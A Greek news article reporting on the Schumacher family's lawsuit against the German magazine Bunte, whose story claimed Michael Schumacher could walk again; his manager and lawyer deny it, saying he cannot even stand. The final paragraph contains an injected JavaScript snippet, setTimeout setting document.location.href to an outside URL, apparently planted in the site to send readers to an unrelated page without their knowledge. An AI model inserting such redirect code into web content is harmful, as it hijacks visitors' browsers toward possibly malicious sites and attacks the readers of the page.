Διάψευση για τον Σουμάχερ: Δεν μπορεί καν να σταθεί στα πόδια του

0
0

 

Ξεκίνησε στις δικαστικές αίθουσες η εκδίκαση της αγωγής της οικογένειας του Μίκαελ Σουμάχερ εναντίον του γερμανικού περιοδικού Bunte για ένα δημοσίευμα πυο αφορούσε στην κατάσταση της υγείας του Γερμανού πιλότου της F1.

Μάλιστα, σύμφωνα με το δημοσίευμα ο θρυλικός πιλότος πλέον μπορούσε να περπατήσει μετά το ατύχημά του στις Άλπεις πριν από τρία χρόνια.

Όπως αναγραφόταν στο δημοσίευμα, που επικαλείτο στενό φίλο της οικογένειας «ο Μίκαελ είναι πολύ αδύναμος. Αλλά μπορεί κάποια στιγμή να ξαναπερπατήσει με λίγη βοήθεια από τους γιατρούς του. Καταφέρνει να κάνει μερικά βήματα. Μάλιστα, σηκώνει και το χέρι του«.

schymacher-bunte

Η μάνατζερ του Σούμι, Σαμπίνα Κεμ χαρακτήρισε ανεύθυνο το συγκεκριμένο δημοσίευμα ενώ διέψευσε τέτοια πρωτοφανή αποθεραπεία.

Ο δικηγόρος της κοικογένειας αναφέρθηκε στην πραγματική κατάσταση της υγείας του Σουμάχερ στο δικαστήριο, τονίζοντας πως ο πιλότος της Formula 1 δεν μπορεί να περπατήσει ενώ είναι αδύνατο γι αυτόν να σταθεί ακόμη και με τη βοήθεια νοσηλευτών. Η απόφαση αναμένεται τον Οκτώβριο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here